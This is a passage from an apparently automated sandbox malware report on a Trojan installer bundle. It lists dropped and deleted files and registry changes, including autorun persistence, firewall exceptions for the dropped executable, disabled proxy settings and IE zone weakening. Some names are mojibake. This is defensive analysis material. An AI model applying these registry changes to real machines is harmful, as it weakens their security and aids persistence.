%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\9377mycs_Y_mgaz2_01.exe (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\iplookup[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh81.tmp (0 bytes)

The process MYLogger.exe:504 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@9377[1].txt (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\core[2].php (751 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\wczc_btn[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@client.9377[1].txt (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\input_bg[1].jpg (6 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (3180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\quick_register[1].jpg (392 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@9377[2].txt (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].php (2408 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@9377[1].txt (0 bytes)

The process 9377mycs_Y_mgaz2_01.exe:1812 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ\uninstall.lnk (1 bytes)
%Program Files%\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ\MeiYing.dll (16288 bytes)
%Program Files%\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ\MYLogger.ini (827 bytes)
%Documents and Settings%\All Users\Desktop\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tongji.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu9E.tmp (34827 bytes)
%Program Files%\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ\replay.htm (309 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\inetc.dll (784 bytes)
%Program Files%\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ.lnk (1 bytes)
%Program Files%\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ\MYLogger.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\CheckBoxes.dll (1856 bytes)
%Program Files%\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ\uninstall.exe (5203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\webctl.dll (8184 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ\9377ÃƒÆ’Ã‚Â·ÃƒÆ’Ã‹â€ ÃƒÆ’Ã¢â‚¬Å“Ãƒâ€šÃ‚Â°Ãƒâ€šÃ‚Â´Ãƒâ€šÃ‚Â«ÃƒÆ’Ã¢â‚¬Â¹Ãƒâ€šÃ‚Âµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\ip.dll (784 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\webctl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\CheckBoxes.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu9D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz9F.tmp\ip.dll (0 bytes)

The process bddownloader.ex:2968 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Baidu\BDDownload\106\bddownloader.exe (9605 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\dl.dll (14988 bytes)

Registry activity

The process fm4.exe:1820 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"Publisher" = "ÃƒÆ’Ã¢â‚¬â„¢ÃƒÆ’Ã‚Â´ÃƒÆ’Ã¢â€šÂ¬ÃƒÆ’Ã¢â‚¬â€œFM"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"DisplayIcon" = "%Program Files%\FM4.0_201410162111\201410162111\Unins.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"DisplayName" = "ÃƒÆ’Ã¢â‚¬â„¢ÃƒÆ’Ã‚Â´ÃƒÆ’Ã¢â€šÂ¬ÃƒÆ’Ã¢â‚¬â€œFM"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"DisplayVersion" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}]
"UninstallString" = "%Program Files%\FM4.0_201410162111\201410162111\Unins.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 D0 50 E8 CA 53 AD D7 96 8E 8C 70 AC 73 15 C5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\FM4.0]
"RD" = "_201410162111"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FM4.0_201410162111" = "%Program Files%\FM4.0_201410162111\201410162111\fm4.exe -mini"

"FM4.0_News_201410162111" = "%Program Files%\FM4.0_201410162111\201410162111\fm4svr.exe -mini"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

"ProxyServer"

"AutoConfigURL"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BoxNews"

"FM4.0_News"

"FM4.0"

"YyfmPlay"

The process netbian_a_41763.exe:1100 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014101620141017]
"CachePrefix" = ":2014101620141017:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014101620141017]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014101620141017\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014101620141017]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014101620141017]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA CB 64 4C 8A D7 0D 9D 85 00 4F 20 E1 4A 40 EC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014101620141017]
"CacheRepair" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041720130418]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process G0828_s_70988.exe:1500 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 09 CB 77 E8 BE BE 0D BE B9 B0 98 90 23 8B F4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag" = "273"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp]
"G0828_s_70988.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\G0828_s_70988.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¥Ã‚Â®Ã¢â‚¬Â°ÃƒÂ¨Ã‚Â£Ã¢â‚¬Â¦ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp]
"G0828_s_70988.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\G0828_s_70988.exe:*:Enabled:ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¥Ã‚ÂÃ‚Â«ÃƒÂ¥Ã‚Â£Ã‚Â«ÃƒÂ¥Ã‚Â®Ã¢â‚¬Â°ÃƒÂ¨Ã‚Â£Ã¢â‚¬Â¦ÃƒÂ§Ã‚Â¨Ã¢â‚¬Â¹ÃƒÂ¥Ã‚ÂºÃ‚Â"

The process vcredist_x86.exe:3808 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 8E D1 C5 9E 88 D0 FB 8F BF FC 0C 9D 39 C9 1B"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

The process FHSev.exe:1744 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 C0 C0 87 08 97 AD 29 57 30 6F 25 C8 E4 DE 56"

The process FHSev.exe:752 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 06 0A AC DD 5C B8 6C B1 34 38 BC 93 87 FE 50"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process FHSev.exe:628 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 B6 C2 7A E8 C3 5D 89 31 EC C0 79 62 57 0E 3B"

The process FHSev.exe:204 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 C3 6D 62 3B 08 2E 02 F8 63 3C 4A 93 24 0E 51"

The process setup_3386.exe:1808 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

